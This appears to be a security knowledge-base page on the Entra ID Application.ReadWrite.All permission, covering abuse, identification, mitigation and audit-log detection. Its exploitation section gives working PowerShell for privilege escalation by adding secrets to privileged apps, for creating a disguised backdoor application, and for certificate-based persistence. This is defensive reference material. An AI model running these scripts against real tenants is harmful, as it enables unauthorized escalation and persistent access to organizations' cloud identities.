AZ_MG_APPLICATION_READWRITE_ALL

Summary

FSProtect ACL Alias

Entra ID (Azure AD) Alias

Application.ReadWrite.All

Affected Object Types

Service Principals, Applications

Exploitation Certainty

Certain

Graph Permission / Role

Application Permission: Application.ReadWrite.All

Description

AZ_MG_APPLICATION_READWRITE_ALL represents a Microsoft Graph application permission that grants read and write access to all applications and service principals in Microsoft Entra ID (Azure AD). This is a highly dangerous permission because it allows:

Create, read, update, and delete applications (app registrations)
Create, read, update, and delete service principals
Add credentials (secrets and certificates) to any application or service principal
Modify application permissions and API permissions
Change application owners and delegation settings
Modify redirect URIs and authentication configurations
Read and modify application roles and exposed APIs

This permission is often abused for:

Privilege escalation: Adding credentials to applications with high-privilege permissions (e.g., those with Directory.ReadWrite.All)
Persistence: Creating backdoor applications with long-lived credentials
Credential theft: Adding new secrets to existing privileged service principals
OAuth abuse: Modifying redirect URIs to intercept tokens
Lateral movement: Compromising applications that have access to other Azure resources

Important: This is an application permission that requires admin consent and is granted to service principals, not individual users. Once granted, the service principal can perform these actions without additional user context.

Identification

PowerShell

Find Service Principals with Application.ReadWrite.All

Find Service Principals with Application.ReadWrite.All (PowerShell)

Connect-AzAccount

$permissionId = "1bfefb4e-e0b5-418b-a88f-73c46d2cc8e9"  # Application.ReadWrite.All GUID

# Step 1: Get all app role assignments across the tenant
$uri = "https://graph.microsoft.com/v1.0/servicePrincipals?`$expand=appRoleAssignments"
$allServicePrincipals = @()

while ($uri) {
    $response = Invoke-AzRestMethod -Uri $uri -Method GET
    $data = $response.Content | ConvertFrom-Json
    $allServicePrincipals += $data.value
    $uri = $data.'@odata.nextLink'
}

Write-Host "Retrieved $($allServicePrincipals.Count) service principals"

# Step 2: Filter for those with Application.ReadWrite.All
$results = @()

foreach ($sp in $allServicePrincipals) {
    $matchingAssignments = $sp.appRoleAssignments | Where-Object { $_.appRoleId -eq $permissionId }
    
    foreach ($assignment in $matchingAssignments) {
        $results += [PSCustomObject]@{
            ServicePrincipalName = $sp.displayName
            ServicePrincipalId   = $sp.id
            AppId                = $sp.appId
            PermissionName       = "Application.ReadWrite.All"
            PermissionId         = $permissionId
            ResourceId           = $assignment.resourceId
            AssignedDateTime     = $assignment.createdDateTime
        }
    }
}

Write-Host "`nFound $($results.Count) service principals with Application.ReadWrite.All"
$results | Export-Csv -Path ".\ApplicationReadWriteAll_ServicePrincipals.csv" -NoTypeInformation -Encoding UTF8
$results | Format-Table -AutoSize

Exploitation

An attacker with access to a service principal that has Application.ReadWrite.All can perform privilege escalation by adding credentials to high-privilege applications.

Add Credentials to a Privileged Application

Add secret to target application (PowerShell)

# Authenticate as the compromised service principal
$tenantId = "<tenant-id>"
$appId = "<compromised-app-id>"
$clientSecret = "<client-secret>"

$secureSecret = ConvertTo-SecureString $clientSecret -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential($appId, $secureSecret)
Connect-AzAccount -ServicePrincipal -Credential $credential -Tenant $tenantId

# Target application Object ID (from App Registration blade or enumeration)
$targetAppObjectId = "<target-application-object-id>"

# Add a new secret to the target application
$uri = "https://graph.microsoft.com/v1.0/applications/$targetAppObjectId/addPassword"
$body = @{
    passwordCredential = @{
        displayName = "Backup Credential"
        endDateTime = (Get-Date).AddYears(2).ToString("yyyy-MM-ddTHH:mm:ssZ")
    }
} | ConvertTo-Json

$response = Invoke-AzRestMethod -Uri $uri -Method POST -Payload $body
$newCredential = $response.Content | ConvertFrom-Json
Write-Output "Added secret to application. Secret value: $($newCredential.secretText)"

Create a Backdoor Application

Create application, add secret, create service principal (PowerShell)

# Create a new application with a known secret
$uri = "https://graph.microsoft.com/v1.0/applications"
$body = @{
    displayName = "Azure AD Sync Service"
    signInAudience = "AzureADMyOrg"
    requiredResourceAccess = @(
        @{
            resourceAppId = "00000003-0000-0000-c000-000000000000"  # Microsoft Graph
            resourceAccess = @(
                @{
                    id = "19dbc75e-c2e2-444c-a770-ec69d8559fc7"  # Directory.ReadWrite.All
                    type = "Role"
                }
            )
        }
    )
} | ConvertTo-Json -Depth 5

$response = Invoke-AzRestMethod -Uri $uri -Method POST -Payload $body
$newApp = $response.Content | ConvertFrom-Json
Write-Output "Created application: $($newApp.displayName) with AppId: $($newApp.appId)"

# Add a secret to the new application
$uri = "https://graph.microsoft.com/v1.0/applications/$($newApp.id)/addPassword"
$body = @{
    passwordCredential = @{
        displayName = "Primary"
        endDateTime = (Get-Date).AddYears(2).ToString("yyyy-MM-ddTHH:mm:ssZ")
    }
} | ConvertTo-Json

$response = Invoke-AzRestMethod -Uri $uri -Method POST -Payload $body
$credential = $response.Content | ConvertFrom-Json
Write-Output "Secret: $($credential.secretText)"

# Note: The application still needs admin consent for the requested permissions
# Create the service principal
$uri = "https://graph.microsoft.com/v1.0/servicePrincipals"
$body = @{
    appId = $newApp.appId
} | ConvertTo-Json

$response = Invoke-AzRestMethod -Uri $uri -Method POST -Payload $body
$sp = $response.Content | ConvertFrom-Json
Write-Output "Created service principal with ObjectId: $($sp.id)"

Add Certificate to Service Principal for Stealthy Persistence

Add certificate to application (PowerShell)

# Generate or use an existing certificate
$cert = New-SelfSignedCertificate -Subject "CN=AzureBackupCert" -CertStoreLocation "Cert:\CurrentUser\My" -KeyExportPolicy Exportable -KeySpec Signature -KeyLength 2048 -KeyAlgorithm RSA -HashAlgorithm SHA256 -NotAfter (Get-Date).AddYears(2)

# Export the certificate public key as Base64
$certBase64 = [Convert]::ToBase64String($cert.RawData)

# Use the certificate's actual expiration date in proper ISO 8601 UTC format
$endDateTime = $cert.NotAfter.ToUniversalTime().ToString("o")

# Add certificate to target application
$targetAppObjectId = "<target-application-object-id>"
$uri = "https://graph.microsoft.com/v1.0/applications/$targetAppObjectId"
$body = @{
    keyCredentials = @(
        @{
            displayName = "Backup Certificate"
            type = "AsymmetricX509Cert"
            usage = "Verify"
            key = $certBase64
            endDateTime = $endDateTime
        }
    )
} | ConvertTo-Json -Depth 3

Invoke-AzRestMethod -Uri $uri -Method PATCH -Payload $body
Write-Output "Added certificate to application"
Write-Output "Thumbprint: $($cert.Thumbprint)"

# Authenticate using the certificate
$targetAppId = "<target-application-app-id>"
Connect-AzAccount -ServicePrincipal -CertificateThumbprint $cert.Thumbprint -ApplicationId $targetAppId -Tenant $tenantId

Mitigation

Audit all service principals with Application.ReadWrite.All and remove unnecessary grants.
- Go to Microsoft Entra ID -> App registrations -> select the application -> API permissions.
- Remove the Application.ReadWrite.All permission if not required.
Apply least privilege: Replace with more specific permissions where possible:
- Use Application.Read.All if only read access is required.
- Use Application.ReadWrite.OwnedBy if the application only needs to manage applications it owns.
Implement Access Reviews for applications with high-privilege permissions:
- Go to Identity Governance -> Access Reviews -> New access review.
- Review applications with sensitive Graph permissions regularly.
Enable application credential monitoring:
- Monitor for new credentials being added to applications.
- Alert on certificate or secret additions to high-privilege applications.
Lock down application ownership:
- Limit who can be an owner of privileged applications.
- Review application owners regularly.
Use Workload Identity Federation where possible instead of secrets/certificates.

Detection

Detect permission grants and suspicious activity in Audit logs.

Go to Microsoft Entra ID -> Audit logs.
Filter by activities:
- Add app role assignment to service principal
- Add application
- Update application - Certificates and secrets management
- Add service principal credentials
- Update service principal

Monitor for suspicious patterns:

New application creation by service principals (not user-initiated).
Credential additions to existing applications by service principals.
Applications with long credential expiration times (years).
Certificate additions to applications (stealthier than secrets).
Changes to application permissions or required resource access.
Modifications to redirect URIs (potential token interception).

References

PreviousAZ_MG_ADD_SECRET NextAZ_MG_APPROLEASSIGNMENT_READWRITE_ALL

Last updated 6 days ago

Was this helpful?

hashtagSummary

hashtagDescription

hashtagIdentification

hashtagPowerShell

hashtagFind Service Principals with Application.ReadWrite.All

hashtagExploitation

hashtagAdd Credentials to a Privileged Application

hashtagCreate a Backdoor Application

hashtagAdd Certificate to Service Principal for Stealthy Persistence

hashtagMitigation

hashtagDetection

hashtagReferences